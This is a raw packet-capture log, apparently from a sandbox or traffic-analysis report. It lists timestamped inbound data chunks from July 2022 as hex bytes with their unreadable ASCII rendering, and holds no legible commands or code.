b2 00 a0 80 96 93 0b 78 28 3b 0b 08 b5 60 9b fc 19 72 84 b8 7f 96 07 56 19 1f 36 54 79 9a 88 f2 75 9d 80 e2 3b 50 ae 7a 3c 5a 0a f4 31 ca ae 0f 54 6e e9 b9 6e 63 92 c0 2e d9 f9 c6 bb b1 b8 6f d0 9e 39 6b aa a3 bc 25 90 57 0a Data Ascii: }\M&yq^$!#&[D\\-N-E$OA2VO38DGLxuhv&q>&37bvYqW@?gsObhJ!Az7KLN/:^x(;`rV6Tyu;Pz<Z1Tnnc.o9k%W
2022-07-08 04:01:38 UTC	72	IN	Data Raw: be 3c 2e 42 26 26 48 3a dc 11 e8 6c 23 ba 9b 77 ee 89 fc c2 17 cf ff 9e 81 55 bc e4 8f 2e 5b e4 40 ea c6 38 36 ff d9 2d 1b 29 60 5a 18 81 9a 8b 9b fd 4d 9f 4b d7 42 19 fc 16 ab 93 c6 0a 11 eb 85 64 cf 54 a1 93 a6 7c 57 50 75 62 04 bf c0 3f bd 16 4f f0 a5 f7 8c 1a 6a 52 71 33 ff 03 e0 4e 69 3e db 62 e0 77 18 da c5 51 ba 42 5e 93 6d 52 e1 f5 0b 19 ea 34 25 3e 02 c7 2d 21 c5 12 04 a4 a3 37 45 2e 51 3c 13 6e 53 15 5c 25 6f c8 f0 5c f7 42 e4 c7 d1 df 81 80 34 50 51 5c dc b7 69 16 ef 47 a8 c7 c2 c0 fc 55 63 9f a5 4e 9f f2 04 1f 76 31 97 ff 58 bd a4 9c cf 4f 19 b9 87 46 9c 69 fa ef 8a d3 a2 38 b8 ad 33 d6 84 1a e4 b4 f5 23 a6 b3 43 3d a6 4d b7 c9 e0 ed 49 9a f2 90 69 97 0c 3b fc bb da 66 66 b4 83 4e fb b1 66 f8 f1 20 0f c5 66 55 a7 8f 38 e9 63 c7 4d 94 9e 7a 99 Data Ascii: <.B&&H:l#wU.[@86-)`ZMKBdT\|WPub?OjRq3Ni>bwQB^mR4%>-!7E.Q<nS\%o\B4PQ\iGUcNv1XOFi83#C=MIi;ffNf fU8cMz
2022-07-08 04:01:38 UTC	73	IN	Data Raw: 0a a2 b0 bc 40 93 d1 b3 7e f8 eb a2 a6 0c e3 29 9e e2 39 0e ed 7b 12 e4 cf e4 a8 2a de 54 fa 4c 0b f7 eb 91 0d c5 81 4f 92 d1 0d a9 e9 8c 89 73 19 29 08 b2 46 8b e1 81 0c 09 3e 2e cf 8c 3f 12 4e d6 d4 08 0d 27 12 ba 1e fe bb 97 99 1e 65 0c 04 07 19 b6 d1 da ec 15 63 43 a7 62 8c 64 7a 0b 21 cc bb 8a 74 93 8c 5d 4a 93 f5 3b 4d 97 de b1 ed 33 fd 8c 34 51 0f 78 7f e5 d6 a8 7e 92 ca f0 d6 42 ee 9d 18 b8 77 de 93 11 44 aa a3 9b fa 57 b2 03 8d c5 d2 5d 9b 8d 8d ec 58 57 2f db f8 0d f4 7b a0 da a5 f0 49 2e 82 02 82 36 11 7d 9d e3 23 3e de d5 36 1e 9c 33 3f 54 41 be 84 a4 45 f5 1c 16 d6 df 00 2d d7 9c 8c 4a c8 f6 34 de 56 96 e5 63 74 1c 41 5c a0 56 6b bd 9d 21 03 cd 3e bb 6e bc b3 20 9c 2f af 4a 8d ab e4 71 5c fa 11 60 49 7d 20 2f 58 45 1d 6f 73 ad 47 71 26 2f 41 Data Ascii: @~)9{*TLOs)F>.?N'ecCbdz!t]J;M34Qx~BwDW]XW/{I.6}#>63?TAE-J4VctA\Vk!>n /Jq\`I} /XEosGq&/A
2022-07-08 04:01:38 UTC	75	IN	Data Raw: 85 7c 4b 50 bb 2f 31 c1 5b 64 35 0e e9 12 35 d4 0b b5 98 a4 49 11 40 6c 39 3b 83 43 01 4b 1e 55 f5 f1 5a d9 c0 da c6 d7 b6 b1 96 1c 9c 8c 52 ff f0 07 17 ef 4b b4 eb fd d4 93 98 bc 9f a9 76 86 c6 48 1d 76 3b bc 66 9a 91 b6 8a 2c 59 3d b8 87 5d c3 34 e6 a3 80 01 ae 3c 92 ac 28 e7 af 1a b8 b6 f5 df 0a 1e ea 2d db 58 b5 c9 ea e5 4f 3d a6 32 15 91 2a d0 fd bb dc 4c 3d 2e 81 30 c2 5e 69 f8 f7 4f 2e dc 56 5c 79 dd 1d c1 4e 6b 4d 9e 83 21 a2 e8 e2 d0 b4 0d 72 27 82 8e 3b 9e 66 bf 18 9f d6 00 f5 a2 74 89 b1 4a e8 ed a0 d4 b9 e1 bd fb b1 f5 75 74 5e 4f 9f d0 34 f5 f4 75 7f 8b bb 12 59 da 65 9d d1 f3 b2 74 3e d1 79 91 3d c0 b6 5c 5e 50 b1 31 77 2c 37 8c d0 06 12 ff 4f 6e 60 01 d0 83 24 5a 7b d7 78 74 c8 cc 69 44 54 ad 88 28 41 ac a8 8b 78 dd 75 8d 20 50 9b 0f 71 d3 Data Ascii: \|KP/1[d55I@l9;CKUZRKvHv;f,Y=]4<(-XO=2*L=.0^iO.V\yNkM!r';ftJut^O4uYet>y=\^P1w,7On`$Z{xtiDT(Axu Pq
2022-07-08 04:01:38 UTC	76	IN	Data Raw: eb 6a b2 e7 1d b1 cf 35 5b 21 2b 6c e9 b3 47 49 92 c0 24 6e 4f 90 b2 18 b2 55 9a 9c 39 60 82 80 91 24 5d b0 0f 8b 18 d9 83 99 8e 8d f1 77 33 e1 e6 10 34 47 50 f3 de d6 e9 58 3e 9b 06 81 15 00 79 8a c7 9a 2f da ce 12 ae b4 67 37 7c 04 96 dc ac 2a c5 36 c3 df b0 ea 25 c0 40 8c 0d 88 f6 34 de 11 20 e7 63 74 6e 6c 22 1a 55 61 93 b9 30 01 c7 1c ea 7d b9 91 86 8b f9 bb 3f 38 b9 e8 60 a2 47 1d 71 4f 44 97 1e ef 5e 32 4f 74 ac 4d 14 0a 03 78 e6 e6 c9 2a b9 d0 c8 fa 44 ac 1e 94 09 a7 23 8e ca 81 65 0f 97 fd ba 55 4e d4 6b 43 ec 88 8d 32 93 69 5e 6d 93 bb 8b cc 07 8d d9 7b a9 21 77 92 51 0a 42 ba 12 58 fa 7c 22 eb 7c 06 dd 59 9e 27 68 fe 05 13 31 37 49 02 76 c6 ac 4e 6c 5b e4 6b b0 93 f5 02 42 f5 ed bf cb 91 62 4e 5a 1b f2 8b 5a 8f 47 91 ee 3f a7 e9 f8 7c da 5a 36 Data Ascii: j5[!+lGI$nOU9`$]w34GPX>y/g7\|6%@4 ctnl"Ua0}?8`GqOD^2OtMxD#eUNkC2i^m{!wQBX\|"\|Y'h17IvNl[kBbNZZG?\|Z6
2022-07-08 04:01:38 UTC	77	IN	Data Raw: 59 cc 94 90 69 99 32 4a d5 03 de 4e 3b a6 86 60 35 5e 67 fe e2 59 06 f4 67 5f 73 96 87 e9 a9 c4 4d 98 87 44 9f d9 e3 da b4 1d 96 5e a5 8e 3f bc e2 ff 19 99 f8 42 f3 8a 9a a2 5d 4d 87 2a cf f5 b1 cd 92 34 b9 c1 58 71 b6 4c 95 da 09 cd dc 46 74 55 b1 03 bd a3 8d 9e d5 dd 4c 63 16 e4 50 c2 34 d6 2a 1b 8e 50 b1 31 09 08 1d 66 d9 d8 1a b5 a6 43 60 0b f6 b8 1d 72 53 86 72 aa c2 db 46 6d a2 ae 88 2e 54 bc 80 a4 5b dd 71 87 ba 78 71 0c 71 e5 ea 58 0e eb 17 4b a0 8f 65 4a 51 fb 9b 45 cf 45 50 b6 15 4d c2 f4 bb 25 0b 40 58 97 6c b6 15 83 c9 3b 08 2e 81 c8 21 76 98 d9 ce 41 13 0d da b6 f3 1d 1e 93 28 b6 8a a2 0c b9 9a 85 22 38 a0 1e 04 78 08 46 43 11 db a1 a1 7d a6 93 89 a0 15 ae 5f 4f 78 79 16 32 a8 9f 18 a1 c5 33 16 c7 07 57 d5 37 39 68 86 74 d6 1e 70 eb 88 2f 4e Data Ascii: Yi2JN;`5^gYg_sMD^?B]M4XqLFtULcP4P1fC`rSrFm.T[qxqqXKeJQEEPM%@Xl;.!vA("8xFC}_Oxy23W79htp/N
2022-07-08 04:01:38 UTC	78	IN	Data Raw: 10 cd fe 13 3a a1 71 47 8d 9f 9c 2f be 0d 69 a8 e4 7d a8 52 3b 68 69 55 c6 1b 58 4f 35 20 73 ad 05 1e 1c 2d 35 94 dd c8 96 be c3 c2 e4 4e 84 c8 8a 09 a1 4d cd cb 81 63 2c 9d ec bd 9d 72 d5 6b 9c fc 82 9c 38 fc 56 5f 6d 95 aa 81 ff e0 8a d9 86 c6 62 76 2c 57 0c 42 c3 68 9d fb 76 22 d2 89 6a 77 5f 92 53 16 51 fb e6 c6 86 6a 11 78 b9 98 47 55 81 c8 67 a1 94 ef 0d 40 f5 e6 c3 9c 87 71 4d be 05 e7 ae 72 b3 4d 80 ed b6 b9 9e 93 3a da 50 37 26 60 7b ed 49 3c c7 7a ff 4b 23 bc 97 30 6a 88 fc ce 6b 89 ef 9b be d1 b7 3a 9a 78 48 c8 40 ec df 2d 2e 8a ca d0 18 2f 6d 1d 75 80 9a 87 54 fb 5b b0 62 3a 41 19 fa 79 9a 91 35 f9 39 59 98 64 c5 3a 87 a2 a5 7a 1a 56 64 67 80 46 c2 2e c8 6c 7a f2 af f7 9b 61 10 a5 73 37 d1 87 d6 4c 6f 1c a6 cf e0 71 3a 1e 63 51 bc 27 10 d0 6c Data Ascii: :qG/i}R;hiUXO5 s-5NMc,rk8V_mbv,WBhv"jw_SQjxGUg@qMrM:P7&`{I<zK#0jk:xH@-./muT[b:Ay59Yd:zVdgF.lzas7Loq:cQ'l
2022-07-08 04:01:38 UTC	80	IN	Data Raw: 8e 1e da 6d 6b 37 03 da 84 24 57 7b d7 78 a1 d9 ce 54 93 5b a9 99 2c 50 ac 9a 47 84 d3 5e b8 0d 50 9a 05 7c cb d1 4e 26 d2 c8 4b ad b3 ff 62 bf fb 8b 4f a0 8c 51 b0 1f 61 b4 f5 b5 3e 20 73 48 89 74 5f 16 7c cd 54 c9 ef 81 c2 1c 7b 73 de df 42 28 e5 aa a3 f7 08 02 b1 33 4d 8b a8 1d 30 b4 46 db 39 a6 0d 01 55 13 bd 42 1b cb 37 e6 40 a3 93 89 99 3d 87 b2 46 55 68 51 72 ad 9f 18 8f fa 34 79 0a 2e 53 db 26 35 2f 0f 74 d6 1e 41 06 63 f8 b4 a2 af 4e 83 73 b2 7e f2 d2 a0 b3 04 f2 6e 6e e3 39 02 f5 75 2b d9 de ec b8 68 0a 41 f7 97 8d fe fa 97 34 cb 9c 20 47 c3 0a a8 d2 c5 9a 7a 3b db 00 a4 5d ae 27 27 10 fb cc 3d dc 8f 2a 79 5d dc fc f8 05 36 11 0d 39 8a ef 57 99 18 7c 39 28 09 08 bf af 93 fc 1c ff 43 ac 1c 80 0a 47 00 36 10 c5 8f 64 99 e9 75 5a 9b e2 23 db d0 6f Data Ascii: mk7$W{xT[,PG^P\|N&KbOQa> sHt_\|T{sB(3M0F9UB7@=FUhQr4y.S&5/tAcNs~nn9u+hA4 Gz;]''=*y]69W\|9(CG6duZ#o
2022-07-08 04:01:38 UTC	81	IN	Data Raw: 72 04 bd 18 6e 5a c2 4f f6 9f 80 31 6a d6 ec d0 9c 82 64 53 97 c8 f0 86 1a a0 47 9b f7 36 b9 8b c6 2c cb 5d 2c 3f d2 64 ed 62 79 c7 73 c6 7c b9 94 a6 5d 5f 80 ed d5 14 d5 ef 96 96 42 a0 e0 09 23 17 cb 40 e0 a0 72 1c 8c e2 2c 1b 2f eb 2c 76 d8 b2 b7 45 fd 40 02 62 91 40 19 f6 05 be 82 33 e2 02 d6 cf 66 cf 5f 92 80 a5 7c 01 43 73 73 b9 a8 16 3d df 12 5c e1 b5 cc 22 17 03 52 71 31 c4 e6 f0 40 47 5f 8c 61 e6 1e 71 37 c4 57 ad 23 6e 9e 02 65 3e fb 28 20 c9 25 23 5b 31 ee 03 27 d4 16 f2 aa a1 49 11 40 12 39 3b 83 54 04 54 62 fd ca f0 50 ce ba f2 11 c4 a5 b1 97 25 4c 01 e5 c6 7f b9 e9 10 93 b0 ca c4 ed fc 5f b7 8c b7 17 8b ec 04 15 7d 19 bf ff 44 95 7a 90 d4 65 1e 92 87 07 b0 69 e6 a3 8a dd bf 3e b8 ac 28 82 85 1a b8 de f7 23 0a a6 43 2c d5 45 b5 c9 eb fc 7f e0 Data Ascii: rnZO1jdSG6,],?dbys\|]_B#@r,/,vE@b@3f_\|Css=\"Rq1@G_aq7W#ne>( %#[1'I@9;TTbP%L_}Dzei>(#C,E
2022-07-08 04:01:38 UTC	82	IN	Data Raw: 95 62 34 a2 f2 59 27 27 2a 61 43 53 94 26 49 46 24 24 5b 15 4f 1e 1a 3c 47 bd fb c8 2a b5 ac 83 ea 4e 82 d9 9e 18 a9 23 f2 ca 81 65 0f 94 fd ba 55 4c d4 6b 43 ec 8b b4 28 f8 56 59 02 d6 ab 81 e2 d6 9f d0 12 01 63 76 98 89 03 76 98 50 9f fb 76 3b f0 5a 47 77 59 94 f3 52 8f ee c9 e6 c4 5f 13 72 a0 9e 3d 79 58 c8 6d aa b5 ae 3b 42 ff 32 d2 90 bb 65 6e 86 c5 e7 ef 46 a2 47 91 e4 2c aa 21 ed 7e da 14 3d 2e 48 b6 ef 49 3a d9 7e d7 6d 3e bc 9d 5e 5f 8a fc c4 7e 8c fe 9e 8d 52 b7 3a 8a 0a 73 c9 55 ea cc 2b 22 8c e2 2d 00 1f 6f 72 59 83 9a 81 80 fd 4a a4 39 d2 40 19 f6 1c 85 69 34 f3 17 f2 eb 92 ce 55 bc a8 8d 63 0f 50 73 4a 8a bf c0 24 e6 23 49 f0 a9 d5 a9 64 38 59 59 0c d7 e8 eb 62 73 11 a6 7e e4 71 36 1e e6 51 bc 27 57 b1 69 58 39 d3 0d 31 c7 3e 4a c3 0f ef 05 Data Ascii: b4Y''aCS&IF$$[O<GN#eULkC(VYcvvPv;ZGwYR_r=yXm;B2enFG,!~=.HI:~m>^_~R:sU+"-orYJ9@i4UcPsJ$#Id8YYbs~q6Q'WiX91>J
2022-07-08 04:01:38 UTC	83	IN	Data Raw: 18 72 aa c2 d9 48 7d 54 ac 88 28 50 a1 c7 31 5a dd 71 b8 87 50 9a 05 62 e5 8c 75 27 d8 10 58 ad 88 f9 4a 90 fe 9b 49 cf 4d 51 b6 15 0e b0 e4 bc 32 26 5b 66 96 44 5c 03 95 e7 67 c8 2e 8b d5 97 7b b9 db df 42 2e f7 f1 85 f4 08 02 ad 81 9f 32 aa 1b 25 a3 68 09 09 a2 0b 14 45 2d 6f 70 1a cd 31 d9 d8 8f a1 8b b1 15 93 a4 64 4b 7e 79 7b bf 05 36 81 d4 35 73 6f 47 56 df 20 22 01 04 47 d2 14 4c 42 b7 d0 b1 ac 83 6d ba 5a a2 78 d0 c9 a0 b7 02 e1 50 65 d0 38 08 f4 65 99 ca ea e8 b2 43 18 43 d2 79 19 fc f0 81 86 a2 a5 21 41 d6 1c a9 d2 b3 9c 7a 37 a7 c9 b2 4c ac 85 b5 16 26 ce 28 e7 b3 16 2d 59 c9 ea c1 3e 26 18 9d 3f 17 a8 a0 9d 18 70 15 03 23 3b be be 91 fb 8f 0a 6d aa 73 81 1a 40 22 16 ce aa 80 0a da e2 62 4d 82 f4 45 7d be 68 b4 82 32 93 cf 3f 46 f7 7c 7f ee d6 Data Ascii: rH}T(P1ZqPbu'XJIMQ2&[fD\g.{B.2%hE-op1dK~y{65soGV "GLBmZxPe8eCCy!Az7L&(-Y>&?p#;ms@"bME}h2?F\|
2022-07-08 04:01:38 UTC	84	IN	Data Raw: 53 f8 c4 90 92 91 64 2b c5 c4 e7 a8 74 b3 4a fe 23 2d aa 90 33 6b ff 78 10 2e 48 43 fc 47 49 c3 7c d7 67 2e 94 b3 5f 5f 80 22 fd 69 9d e9 48 94 42 a6 2b 8b 19 fd 7e 7f 32 32 d4 c0 9d e4 3b cd 3c 6d 63 30 90 8a bf ce 03 b5 4a 94 d2 67 31 d1 16 ad 99 26 fc 62 eb 9a 64 c5 58 92 8d a5 7c 01 8e 77 64 82 b6 ea 2e ce 42 79 f0 af fd 8a 64 38 96 71 37 d7 35 e1 4e 6f b4 8f 61 e0 64 30 36 c4 4c bc 2d 7e 91 6d 58 3f a9 2e 31 c7 b3 24 34 0e 36 02 21 c5 0d da a4 a5 54 17 2f 50 2b 0b 86 52 e8 5a 0d 3a 01 f0 5a ce b9 f6 c1 ef 60 a0 82 34 5a 9e 54 e5 61 45 3a e7 75 04 ef ec c0 e1 4c bb 9f b2 62 83 10 05 33 7a 20 95 f6 2b 6e a5 92 d8 43 07 ab 81 46 bd 6f fd 5d 8b f1 b3 29 bc c3 2f e7 87 10 ab b1 e9 30 0c b3 52 2a cf a6 b4 e5 ef f1 42 ff b4 97 69 82 22 c9 03 ba f0 48 3f a4 Data Ascii: Sd+tJ#-3kx.HCGI\|g.__"iHB+~22;<mc0Jg1&bdX\|wd.Byd8q75Noad06L-~mX?.1$46!T/P+RZ:Z`4ZTaE:uLb3z +nCFo])/0R*Bi"H?
2022-07-08 04:01:38 UTC	85	IN	Data Raw: a7 73 a9 9f 0f b6 c5 25 e3 0d 0f 6e 13 24 33 07 25 1b e0 16 4a 27 65 c3 a7 b5 bd 70 1a 5f b3 7e e9 e9 b5 a5 9e e7 42 44 f2 3d 67 cb 70 03 e8 cd e9 c1 ac 0c 55 f0 59 1e ed ff bf 4d c9 98 26 2e e7 0f af f0 92 66 7b 27 36 09 a3 49 8e fb 94 07 27 b0 19 cd 86 18 39 a1 dd ea 17 0c 36 1d bf 7b 89 80 90 f6 2f 74 00 1f 1f f6 be a8 65 ec 75 74 57 83 27 83 0b 41 65 16 c8 aa 8c 71 67 e2 74 b5 92 93 3b 44 97 3d b6 ed 33 fd f8 37 51 03 6a 90 e8 af 91 7e f2 9f 17 cf 65 c6 b0 6b 83 7c cd 98 2a 60 b0 2e 89 24 57 a2 18 80 02 db 43 a2 d7 98 fa 60 9e c1 3e 10 0d 10 7c a0 da 74 f2 51 36 a0 5e ae 56 14 df 8a d1 94 16 8b db 1e bf 3e 22 2f 6f 07 96 7e af 2a c9 0d 11 cd b9 ff 38 c1 85 8f 0e ed e5 21 c5 2d e2 f6 6e 6f 0a 55 79 77 62 69 bb e4 1e 18 dc 31 a2 72 d6 ac 8c 9c 25 d1 6e Data Ascii: s%n$3%J'ep_~BD=gpUYM&.f{'6I'96{/teutW'Aeqgt;D=37Qj~ek\|`.$WC`>\|tQ6^V>"/o~8!-noUywbi1r%n
2022-07-08 04:01:38 UTC	87	IN	Data Raw: 9c 76 2c 7b cb 37 d7 ee 6d 1f 6f 16 8f 72 e9 60 39 20 48 00 bc 2d 7e 87 45 a1 3f fb 24 1d c2 0c dc 36 0e ef 15 32 d0 66 cb a5 a5 43 04 39 40 2c 1b 85 50 15 5a 1f 2f d9 e6 72 61 af e5 c1 5b e1 a0 82 35 49 86 43 f0 89 c8 47 ef 4d a4 f9 c4 39 fc 5f b7 b3 a6 5c 5d ec 04 1f 67 27 82 ee 55 8a b2 ac 65 4d 19 b8 90 57 b9 7a d6 b0 9d e5 1d 3a b8 ac 39 f7 96 16 90 a2 f4 23 00 9b 52 2c d5 52 a6 d0 c2 cc 4d e4 ad 8f 5a 8a 36 c1 ef aa f4 66 3f b7 89 59 df 75 9a f8 f7 45 44 11 4e 73 7b 81 17 ea 56 d5 5c 8c 83 7a 9a e8 e2 d0 af 07 24 8b 83 8e 35 60 93 64 30 b7 fc 53 fc dc 63 a0 5d 41 fb f0 de ec d4 f4 b6 25 b5 f8 d1 5a 5e 49 fa f3 1e db fe 66 51 47 98 05 03 9a 7d b5 c4 db 59 7f 51 e7 53 c2 34 af a5 74 b3 5b 99 11 1a 0d 3f 9d c3 b7 09 db 67 49 48 8c d9 8e 0a 1b 54 d5 72 Data Ascii: v,{7mor`9 H-~E?$62fC9@,PZ/ra[5ICGM9_\]g'UeMWz:9#R,RMZ6f?YuEDNs{V\z$5`d0Sc]A%Z^IfQG}YQS4t[?gIHTr
2022-07-08 04:01:38 UTC	88	IN	Data Raw: e7 1e b8 3b ad 73 87 02 c9 bd 29 44 1d 50 72 43 f4 b4 c6 8b f3 2a 40 ac 6c bb 63 82 84 fe 1e 47 00 f0 d9 fe 63 7c 61 81 ca 05 c0 76 c2 a1 12 b1 6c c7 04 11 0c ae a3 97 0c 74 a3 0b 90 b1 d0 5f 9d 53 8f f0 77 36 c1 3a 36 c4 4b f6 17 ca e7 d4 5d 3d 83 03 24 e1 03 79 15 7c 9a e4 cd c0 0d b5 b7 2c 24 78 1f b2 8c bf 21 55 36 71 d8 b0 ea 05 f4 96 9b 2f 7e e5 3f c3 ef 6b ee 72 72 18 92 67 14 44 67 aa f1 03 da be 45 b1 7f b3 88 87 8d 2b b6 43 22 bb c4 4f c6 51 11 60 52 74 96 0f c2 5c 20 31 66 b4 5a 07 6f 5f 43 95 d7 db 3b ae d2 d6 c3 1f 86 c8 91 1f 2c 4b cf cb 80 77 0a 89 c4 25 3a 73 df 43 a6 fd 82 96 ba ad 56 5f 6c 86 b8 90 f6 c7 02 88 7d c6 63 5e 6a 57 0c 59 98 9e 9f fb 76 3f 2c ff 46 77 59 9f 3e 5c 47 e8 e1 d8 fa 4c 3b 82 b2 95 48 7f 55 de 74 b5 ee bb 3a 42 f3 Data Ascii: ;s)DPrC*@lcGc\|avlt_Sw6:6K]=$y\|,$x!U6q/~?krrgDgE+C"OQ`Rt\ 1fZo_C;,Kw%:sCV_l}c^jWYv?,FwY>\GL;HUt:B
2022-07-08 04:01:38 UTC	89	IN	Data Raw: cc b1 2f 35 ab 28 e6 86 09 9e a5 d3 35 1b a9 cf 7d d5 58 b4 6b fb c1 5b cc e7 90 69 99 3b f0 71 ea dc 4e 3c a1 ab bf d3 5d 6d d4 d8 5e 20 d0 eb 58 79 81 1c d2 6d d6 6e 88 83 48 3b bb e2 da bf a9 1d 55 97 a6 7f b7 8d b4 07 e6 72 02 f6 a2 73 b7 75 3f ea eb c5 cf d1 1e 48 da ae cb 75 a3 5f 4f 93 ca 34 eb f4 75 7f 43 95 06 36 9b 75 89 c4 c0 71 c1 3f d7 57 ad 01 c1 b0 72 98 5d a0 27 30 f7 34 8c dc b7 23 db 67 45 76 12 c3 88 63 2c 7b d7 78 b9 e0 e1 7b 57 60 85 d1 28 41 a0 bb 8b 4b c1 14 ac 21 50 9c 1e 61 8c c3 4f 26 de 79 81 aa 99 f5 4e a5 eb 87 20 9e 8d 51 b0 0e 32 92 cb ba 23 26 1c 83 92 44 50 3a 86 d8 47 d0 f0 98 d0 25 7b d5 df df 4e 16 5e 07 b8 e7 20 f6 ad 11 b7 8a b3 74 7e b2 6e 2b e4 b7 12 3f 47 2a 57 6b 75 c9 3b c8 2d e4 92 8f b7 15 97 a2 23 bf 7e 79 7b Data Ascii: /5(5}Xk[i;qN<]m^ XymnH;Ursu?Hu_O4uC6uq?Wr]'04#gEvc,{x{W`(AK!PaO&yN Q2#&DP:G%{N^ t~n+?G*Wku;-#~y{
2022-07-08 04:01:38 UTC	91	IN	Data Raw: f3 ed 2d d1 90 8a 23 b3 33 35 d4 33 6a ed 4b 3c 0d 44 7e 22 e1 95 44 11 ec 0f df 3c 4d 69 99 9b 8e 87 40 f8 62 34 a2 38 71 5e 54 11 21 77 55 87 2d 58 4f 35 58 73 ad 4d 10 1d 2d 41 13 dc c8 2a b1 c3 c2 eb 4e 84 c8 97 0b a1 4c cf 9d 81 63 1e fd ed bd 3a c5 d4 6b 45 f3 82 9c 36 fc 56 5f 6d 8e 9a 89 e4 f2 8b d9 7d 14 62 76 83 24 19 51 b0 77 95 88 0a 2a fa 78 65 7f 71 e9 29 52 57 d3 94 ca e9 59 3b d9 b0 95 48 1f 2d ca 67 ab f2 f8 39 42 ff e4 f8 ef 95 62 42 ae bf e3 ae 74 8a e6 92 e4 2a d9 ed ef 7e d0 3f 45 2c 48 43 e7 61 4d d2 7e d1 45 58 b8 9d 59 77 2b ff c4 7e ff 89 9c 87 59 d8 42 98 0b 79 c1 68 93 c8 2b 39 a4 9e 28 1b 29 43 d3 35 81 9c f2 32 ff 4a bf 25 bf 40 19 f6 1e 85 ee 31 f3 17 d6 e6 60 cf 53 92 02 a6 7c 0d 23 02 60 a8 b5 af 56 cc 03 47 f8 87 80 8e 64 Data Ascii: -#353jK<D~"D<Mi@b48q^T!wU-XO5XsM-ANLc:kE6V_m}bv$Qwxeq)RWY;H-g9BbBt*~?E,HCaM~EXYw+~YByh+9()C52J%@1`S\|#`VGd
2022-07-08 04:01:38 UTC	92	IN	Data Raw: 1f e3 d7 db 53 1a 7d d6 51 c4 2f d1 a1 64 a7 79 35 33 18 0b 23 01 dd d8 1c db 73 57 74 29 42 8e 0c 7e 53 70 72 aa c2 a5 7c 44 48 ab 99 39 48 bb a2 f8 21 df 7b 9a 5b 2d 98 0f 7b 8c be 4f 26 de 07 5a 82 63 fe 62 b9 95 a6 4e a0 8a 57 a7 0e 4d 3a f4 bb 29 31 67 5e 44 57 4e 07 97 de 41 47 99 be 7f f3 ac 76 ce d5 53 ed f2 d3 a7 ff 19 1b 85 45 49 75 57 1d 09 b2 6e 20 28 a6 0b 12 50 0e 46 8d 18 cf 37 d3 42 a7 92 94 81 17 86 d1 4d 78 7f aa 71 a9 8e 6d b2 d6 35 73 0a 19 4d f7 f2 33 07 26 5c 59 10 4a 2b 5e 05 b1 a6 a5 43 b4 47 9b aa f8 fa ae 9f 94 f0 46 4b cb ec 08 fe 78 0f ea f6 d5 b2 45 07 6c d0 4b 18 fc fd bf 27 cd 98 2a 6c d7 0b a2 27 9b 99 7a 31 cf 7b 65 4d a6 af 83 03 30 db 06 84 82 12 2b 30 0d fd e9 0b 0a 1f 91 25 50 80 97 99 18 60 11 11 64 da be be 9d fa cf Data Ascii: S}Q/dy53#sWt)B~Spr\|DH9H!{[-{O&ZcbNWM:)1g^DWNAGvSEIuWn (PF7BMxqm5sM3&\YJ+^CGFKxElK'*l'z1{eM0+0%P`d
2022-07-08 04:01:38 UTC	93	IN	Data Raw: 5d 53 b0 77 8e f7 6d 20 d2 9c 68 77 53 97 3c 57 3e d0 ed ce ef 30 da 79 b3 9f 5d 66 29 f3 66 a1 9b 93 30 53 fe c4 4a 92 91 64 2b c5 c4 e7 a8 63 a9 56 9c 8b 11 ab 9a eb 6f d1 41 37 41 77 48 ef 4f 2b dd 6f de 02 62 bd 9d 59 81 85 d9 ec 55 8c fe 94 94 5d 9f 14 9a 0b 79 17 40 fb cb 3c e9 9f e5 3d 1c 3e 7b 4c 68 7e 65 7e 43 d7 42 9f 4a c7 43 05 fc 16 ad 93 8b f2 1b 36 99 70 d2 55 ba a2 a5 7c 1b 52 f1 f6 aa b0 dd 2e ce 02 56 c0 aa fd 39 66 38 53 a7 37 d7 f9 fe 52 47 c2 8e 61 ea 59 a6 32 c4 57 94 0e 7f 91 67 53 4c ee 2c 31 cd 3e 3a 14 83 c0 03 21 c4 0b d5 b5 aa 5f 08 1a cd 29 34 92 72 f5 5a 0d 3a 57 e1 55 c7 8f 60 c7 d7 b0 3c 93 3b 43 90 62 65 8e 4b 0c cf c7 a5 ef ec 5c ed 50 a6 80 ce f8 8f e1 18 3f e7 31 91 ff d8 8e ab 8f f2 ec 19 b8 87 da bd 66 f8 83 1c dd bf Data Ascii: ]Swm hwS<W>0y]f)f0SJd+cVoA7AwHO+obYU]y@<=>{Lh~e~CBJC6pU\|R.V9f8S7RGaY2WgSL,1>:!_)4rZ:WU`<;CbeK\P?1f
2022-07-08 04:01:38 UTC	94	IN	Data Raw: 08 0e d4 58 b6 8a ae 0a 29 9a 27 23 38 a0 64 53 51 3b 41 44 0a c7 54 09 43 a7 99 51 bd 3b ab b2 4c 72 57 57 71 a9 95 c0 a7 c5 38 6e d6 15 5a ce 2b 22 09 a2 c3 e9 96 b4 d2 89 c1 ba b1 79 5b a0 4c b8 6f f4 74 13 88 5d 0a b9 b2 e4 13 08 fe 72 42 fe de ec b2 45 0d 55 7c 4a 18 fc c1 96 1c cd 59 21 41 d0 01 af fa 86 85 7a 31 c9 13 82 48 a6 84 91 07 21 07 2e cf 97 61 38 5d dc f6 e3 12 3d 30 43 28 8d 8a be 3c 1c 76 06 3d 28 08 bf b4 97 e5 3d 5e 52 ab 79 be 03 46 0a 21 c2 82 60 64 99 e9 4a df 92 f3 2c 52 bb 79 b6 fa b8 c8 cf 35 50 1a 72 7f e5 af 70 75 0f d1 22 b6 5f c7 b0 12 b5 74 de 90 2f 79 a7 9b 5c 24 57 a3 1a 94 02 cc cf 99 80 8d ff 09 3b d1 24 0d 32 73 7d 7d 6d d6 e3 4b 3f 8d 22 0c 52 12 7b b3 f2 8c 3e d4 c9 84 aa 9a 22 30 6d 08 96 7e af 2a c9 71 5c dc b0 e6 Data Ascii: X)'#8dSQ;ADTCQ;LrWWq8nZ+"y[Lot]rBEU\|JY!Az1H!.a8]=0C(<v=(=^RyF!`dJ,Ry5Prpu"_t/y\$W;$2s}}mK?"R{>"0m~*q\
